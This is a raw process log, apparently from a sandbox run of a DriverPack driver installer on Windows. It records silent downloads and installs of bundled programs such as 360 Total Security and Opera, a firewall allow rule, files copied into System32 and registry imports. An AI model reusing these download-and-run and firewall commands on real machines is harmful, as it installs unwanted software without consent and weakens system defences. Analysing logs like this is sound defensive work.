"C:\Windows\System32\cmd.exe" /c ""tools\aria2c.exe" "http://dl.driverpack.io/soft/DotNetXP.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_92240.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe

"tools\aria2c.exe" "http://dl.driverpack.io/soft/DotNetXP.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\Chrone.exe" /S || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\installing_42984.txt""

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\Chrone.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\Chrone.exe" /S

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\aria2c.exe" "http://dl.driverpack.io/soft/360tsNew.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_3209.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe

"tools\aria2c.exe" "http://dl.driverpack.io/soft/360tsNew.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\DirectX.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\installing_11951.txt""

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\DirectX.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\DirectX.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\set_x64.cmd" "

C:\Windows\system32\xcopy.exe

xcopy x64\GAC C:\Windows\assembly\GAC /s /e /i /y

C:\Windows\system32\xcopy.exe

xcopy x64\Microsoft.NET C:\Windows\Microsoft.NET /s /e /i /y

C:\Windows\system32\xcopy.exe

xcopy x64\System32 C:\Windows\System32 /s /e /i /y

C:\Windows\system32\xcopy.exe

xcopy x64\SysWow64 C:\Windows\SysWow64 /s /e /i /y

C:\Windows\regedit.exe

regedit /s x64\64bit.reg

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\aria2c.exe" "http://download.driverpacks.net/soft/ab/4/Internet-Start.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120 || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\run_command_25675.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe

"tools\aria2c.exe" "http://download.driverpacks.net/soft/ab/4/Internet-Start.exe.torrent" --dir="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" --quiet --continue --min-split-size=1M --follow-torrent=true --check-integrity --seed-time=0 --bt-stop-timeout=120

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\RuntimePack.exe" -s || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\installing_46505.txt""

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\RuntimePack.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\RuntimePack.exe" -s

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\install.cmd" -s "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ver

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\comct232.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\comct332.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\comctl32.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\comdlg32.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\dblist32.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\mci32.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\mscomct2.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\mscomctl.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\mscomm32.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\msdatgrd.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\msdatlst.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\msflxgrd.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\mshflxgd.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\msinet.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\msmask32.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\msstdfmt.dll"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\msstkprp.dll"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\mswinsck.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\picclp32.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\richtx32.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\sysinfo.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\tabctl32.ocx"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe /S "C:\Windows\System32\msvbvm50.dll"

C:\Windows\SysWOW64\regedit.exe

regedit.exe /s VBA60_OCX_License.reg

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\Sysnative\libcrypto-1_1-x64.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\Sysnative\libssl-1_1-x64.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\Sysnative\OpenAL32.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\Sysnative\wrap_oal.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\atl70.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\atl71.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\comct232.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\comct332.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\comctl32.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\comdlg32.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\dblist32.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\libcrypto-1_1.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\libeay32.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\libssl-1_1.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mci32.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mfc70.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mfc70chs.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mfc70cht.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mfc70deu.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mfc70enu.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mfc70esp.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mfc70fra.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mfc70ita.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mfc70jpn.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mfc70kor.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mfc70u.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MFC71.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MFC71CHS.DLL"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MFC71CHT.DLL"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MFC71DEU.DLL"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MFC71ENU.DLL"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MFC71ESP.DLL"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MFC71FRA.DLL"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MFC71ITA.DLL"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MFC71JPN.DLL"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MFC71KOR.DLL"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MFC71u.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mscomct2.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mscomctl.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mscomm32.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\msdatgrd.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\msdatlst.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\msflxgrd.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MShflxgd.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\msinet.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\msmask32.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\msstdfmt.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MSSTKPRP.DLL"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\msvbvm50.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\msvci70.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\MSVCP70.DLL"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\msvcp71.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\msvcr70.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\msvcr71.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\msvcrt10.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\mswinsck.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\OpenAL32.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\picclp32.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\richtx32.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\ssleay32.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\sysinfo.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\tabctl32.ocx"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\Vb40032.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\wrap_oal.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\Vb40016.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\vbrun100.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\vbrun200.dll"

C:\Windows\SysWOW64\compact.exe

compact.exe /i /c /a /f "C:\Windows\System32\Vbrun300.dll"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\DriverPack-Alice.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\installing_73040.txt""

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\DriverPack-Alice.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\DriverPack-Alice.exe"

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer yandex_games-icon /download /priority foreground "https://sdi-tool.org/yandex_games.ico" "C:\Users\Public\Downloads\yandex_games.ico"

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer yandex_pogoda-icon /download /priority foreground "https://sdi-tool.org/yandex_pogoda.ico" "C:\Users\Public\Downloads\yandex_pogoda.ico"

C:\Windows\SysWOW64\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="DriverPack-Alice" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\DRPSu\Alice\cloud.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360tsNew.exe" /s || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\installing_41689.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1287084409-19165743191152050538-317926511794999171-62197688713637879622628336"

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360tsNew.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360tsNew.exe" /s

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\DotNetXP.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\installing_83300.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "454620272101029065-752161686281783305106506655315504882421266129195-1040163590"

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\DotNetXP.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\DotNetXP.exe"

C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe" --host=https://autoupdate.geo.opera.com/ --pipeid --version=64.0.3417.73 --edition="Campaign 34" --lang=en-US --producttype --requesttype=shutdown --operadir="C:\Program Files (x86)\Opera\64.0.3417.73" --installdir="C:\Program Files (x86)\Opera" --user-data-dir="C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable" --installationdatadir="C:\Program Files (x86)\Opera" --firstrunver=36.0.2130.80 --consent-info=eyJzdGFydHBhZ2VfbmV3c19jb25zZW50X2dpdmVuIjpmYWxzZSwic3RhdGlzdGljc19jb2xsZWN0aW9uX2VuYWJsZWQiOnRydWUsInVzZXJfZXhwZXJpZW5jZV9tZXRyaWNzX3JlcG9ydGluZ19lbmFibGVkIjp0cnVlfQ== --firstrunts=1714755097

C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_autoupdate.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=64.0.3417.73 --initial-client-data=0xbc,0xc0,0xc4,0xb8,0xc8,0x13ff80650,0x13ff80660,0x13ff80670

C:\Windows\TEMP\NET\WinPKG.exe

C:\Windows\TEMP\NET\WinPKG.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360TS_Setup.exe

"C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS\360TS_Setup.exe" /c:WW.DRP.CPI202305 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=

C:\Program Files (x86)\1714755241_0\360TS_Setup.exe

"C:\Program Files (x86)\1714755241_0\360TS_Setup.exe" /c:WW.DRP.CPI202305 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"

C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe

"C:\Program Files (x86)\360\Total Security\Utils\PowerSaver.exe" /flightsigning

C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe" /install

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\360\Total Security\MenuEx64.dll"

C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe"

C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe

/showtrayicon

C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe" /install

C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe

"C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe" /cleantip=1

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe /s "C:\Program Files (x86)\360\Total Security\safemon\safemon.dll"

C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe" /watch

C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe

"C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe"

C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe

"C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe authroots.sst

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe updroots.sst

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe -l roots.sst

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updroots.exe -d delroots.sst

C:\Windows\system32\msiexec.exe

msiexec.exe /i C:\Windows\TEMP\NET\1.1\netfx.msi /norestart /qb-!

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000005C4" "00000000000005C8"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding F83C85549F1C29B1171B710FD032ADA8

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 86B22949B6535EFDA5D02732C2DFD98E M Global\MSI0000

C:\Windows\SysWOW64\URTTEMP\regtlib.exe

"C:\Windows\SysWOW64\URTTEMP\regtlib.exe" "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorlib.tlb"

C:\Windows\SysWOW64\URTTEMP\regtlib.exe

"C:\Windows\SysWOW64\URTTEMP\regtlib.exe" "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscoree.tlb"

C:\Windows\SysWOW64\URTTEMP\regtlib.exe

"C:\Windows\SysWOW64\URTTEMP\regtlib.exe" "C:\Windows\Microsoft.NET\Framework\v1.1.4322\System.Drawing.tlb"

C:\Windows\SysWOW64\URTTEMP\regtlib.exe

"C:\Windows\SysWOW64\URTTEMP\regtlib.exe" "C:\Windows\Microsoft.NET\Framework\v1.1.4322\System.EnterpriseServices.tlb"

C:\Windows\SysWOW64\URTTEMP\regtlib.exe

"C:\Windows\SysWOW64\URTTEMP\regtlib.exe" "C:\Windows\Microsoft.NET\Framework\v1.1.4322\System.tlb"

C:\Windows\SysWOW64\URTTEMP\regtlib.exe

"C:\Windows\SysWOW64\URTTEMP\regtlib.exe" "C:\Windows\Microsoft.NET\Framework\v1.1.4322\System.Windows.Forms.tlb"

C:\Windows\SysWOW64\URTTEMP\regtlib.exe

"C:\Windows\SysWOW64\URTTEMP\regtlib.exe" "C:\Windows\Microsoft.NET\Framework\v1.1.4322\Microsoft.JScript.tlb"

C:\Windows\SysWOW64\URTTEMP\regtlib.exe

"C:\Windows\SysWOW64\URTTEMP\regtlib.exe" "C:\Windows\Microsoft.NET\Framework\v1.1.4322\Microsoft.Vsa.tlb"

C:\Windows\SysWOW64\URTTEMP\regtlib.exe

"C:\Windows\SysWOW64\URTTEMP\regtlib.exe" "C:\Windows\Microsoft.NET\Framework\v1.1.4322\Microsoft.Vsa.Vb.CodeDOMProcessor.tlb"

C:\Windows\SysWOW64\wbem\mofcomp.exe

"C:\Windows\system32\wbem\mofcomp.exe" "C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet.mof"

C:\Windows\Microsoft.NET\Framework\v1.1.4322\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v1.1.4322\RegSvcs.exe" /bootstrapi

C:\Windows\system32\dllhost.exe

C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}

C:\Windows\System32\msdtc.exe

C:\Windows\System32\msdtc.exe

C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe

"C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe" /i

C:\Windows\Microsoft.NET\Framework\v1.1.4322\gacutil.exe

"C:\Windows\Microsoft.NET\Framework\v1.1.4322\gacutil.exe" /if "C:\Windows\Microsoft.NET\Framework\v1.1.4322\System.Web.Mobile.dll"

C:\Windows\Microsoft.NET\Framework\v1.1.4322\gacutil.exe

"C:\Windows\Microsoft.NET\Framework\v1.1.4322\gacutil.exe" /if "C:\Users\Admin\AppData\Local\Temp\GAC\System.Web.Mobile.dll"

C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe

"C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_regiis.exe" -u

C:\Windows\Microsoft.NET\Framework\v1.1.4322\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v1.1.4322\RegSvcs.exe" /bootstrapu

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" "http://dl.driverpack.io/soft/ab/4/Internet-Start.exe" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_10429.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_10429.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Roaming\DRPSu\PROGRAMS" "http://dl.driverpack.io/soft/ab/4/Internet-Start.exe" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_10429.log"

C:\Windows\system32\cmd.exe

cmd /c C:\Windows\TEMP\NET\1.1\cleanup.bat

C:\Windows\system32\net.exe

net.exe user aspnet /delete

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user aspnet /delete

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\M928366" /v DisplayName /t reg_sz /d "" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" /v DisplayName /t reg_sz /d "Microsoft .NET Framework 1.1 SP1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft .NET Framework 1.1 (1033)" /v DisplayName /t reg_sz /d "Microsoft .NET Framework 1.1 SP1" /f

C:\Program Files (x86)\Opera\launcher.exe

"C:\Program Files (x86)\Opera\launcher.exe"

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe" --ran-launcher --started-from-shortcut

C:\Program Files (x86)\Opera\64.0.3417.73\opera_crashreporter.exe

"C:\Program Files (x86)\Opera\64.0.3417.73\opera_crashreporter.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=64.0.3417.73 --initial-client-data=0x160,0x164,0x168,0x15c,0x16c,0x7feeeb95428,0x7feeeb95438,0x7feeeb95448

C:\Program Files (x86)\Opera\64.0.3417.73\opera.exe

